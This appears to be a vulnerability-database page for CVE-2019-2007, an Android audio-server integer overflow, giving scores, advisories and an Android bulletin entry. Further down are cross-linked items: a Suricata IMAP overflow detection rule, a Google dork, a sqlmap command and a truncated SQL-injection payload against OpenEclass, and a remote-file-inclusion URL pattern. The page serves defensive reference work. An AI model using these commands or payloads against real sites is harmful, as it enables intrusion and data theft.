CVE-2019-2007
published 2019-06-19CVE-2019-2007: In getReadIndex and getWriteIndex of FifoControllerBase.cpp, there is a possible out-of-bounds write due to an integer overflow. This could lead to local…
PriorityP348critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EPSS
0.92%
56.6th percentile
In getReadIndex and getWriteIndex of FifoControllerBase.cpp, there is a possible out-of-bounds write due to an integer overflow. This could lead to local escalation of privilege in the audio server with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9Android ID: A-120789744
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| android | — | — | |
| android | — | — | |
| android | — | — | |
| android | — | — |
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-wrfc-97qx-4vm7: In getReadIndex and getWriteIndex of FifoControllerBase
ghsa_unreviewed·2022-05-24
CVE-2019-2007 [CRITICAL] GHSA-wrfc-97qx-4vm7: In getReadIndex and getWriteIndex of FifoControllerBase
In getReadIndex and getWriteIndex of FifoControllerBase.cpp, there is a possible out-of-bounds write due to an integer overflow. This could lead to local escalation of privilege in the audio server with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9Android ID: A-120789744
Android
CVE-2019-2007: Android Security Bulletin 2019-03-01
CVE: CVE-2019-2007
Severity: HIGH
Type: EoP
Affected AOSP versions: 8
vendor_android·2019-03-01·CVSS 9.8
CVE-2019-2007 [CRITICAL] CVE-2019-2007: Android Security Bulletin 2019-03-01
CVE: CVE-2019-2007
Severity: HIGH
Type: EoP
Affected AOSP versions: 8
Android Security Bulletin 2019-03-01
CVE: CVE-2019-2007
Severity: HIGH
Type: EoP
Affected AOSP versions: 8.1, 9
References: A-120789744
[2]
Suricata
GPL IMAP login buffer overflow attempt
suricata·2010-09-23
CVE-1999-0005 GPL IMAP login buffer overflow attempt
GPL IMAP login buffer overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 143 (msg:"GPL IMAP login buffer overflow attempt"; flow:established,to_server; content:"LOGIN"; isdataat:100,relative; pcre:"/\sLOGIN\s[^\n]{100}/smi"; reference:bugtraq,13727; reference:bugtraq,502; reference:cve,1999-0005; reference:cve,1999-1557; reference:cve,2005-1255; reference:nessus,10123; reference:cve,2007-2795; reference:nessus,10125; classtype:attempted-user; sid:2101842; rev:16; metadata:created_at 2010_09_23, cve CVE_1999_0005, confidence High, signature_severity Major, updated_at 2019_07_26;)
Exploit-DB
GUnet OpenEclass E-learning platform 1.7.3 - 'uname' SQL Injection
exploitdb·2020-02-24
GUnet OpenEclass E-learning platform 1.7.3 - 'uname' SQL Injection
GUnet OpenEclass E-learning platform 1.7.3 - 'uname' SQL Injection
---
# Exploit Title: GUnet OpenEclass E-learning platform 1.7.3 - 'uname' SQL Injection
# Google Dork: intext:"© GUnet 2003-2007"
# Date: 2019-11-03
# Exploit Author: emaragkos
# Vendor Homepage: https://www.openeclass.org/
# Software Link: http://download.openeclass.org/files/1.7/eclass-1.7.3.tar.gz
# Version: 1.7.3 (2007)
# Tested on: Ubuntu 12 (Apache 2.2.22, PHP 5.3.10, MySQL 5.5.38)
# CVE : -
# GUnet OpenEclass Copy to file -> Save as eclasstestlogin)
4) Load the file to SQLMap with the use of -r parameter
sqlmap -r eclasstestlogin --level=5 --risk=3 -v
SQLMap will find the following payload
---
Parameter: uname (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=te
Exploit-DB
PHPGalleryScript 1.0 - 'init.gallery.php?include_class' Remote File Inclusion
exploitdb·2007-04-10
CVE-2007-2019 PHPGalleryScript 1.0 - 'init.gallery.php?include_class' Remote File Inclusion
PHPGalleryScript 1.0 - 'init.gallery.php?include_class' Remote File Inclusion
---
vendor url: http://tomex.org/
http://[victim]/php/init.gallery.php?include_class=[SHELL DIRECTORY]/something
# milw0rm.com [2007-04-10]
No writeups or analysis indexed.
2019-06-19
Published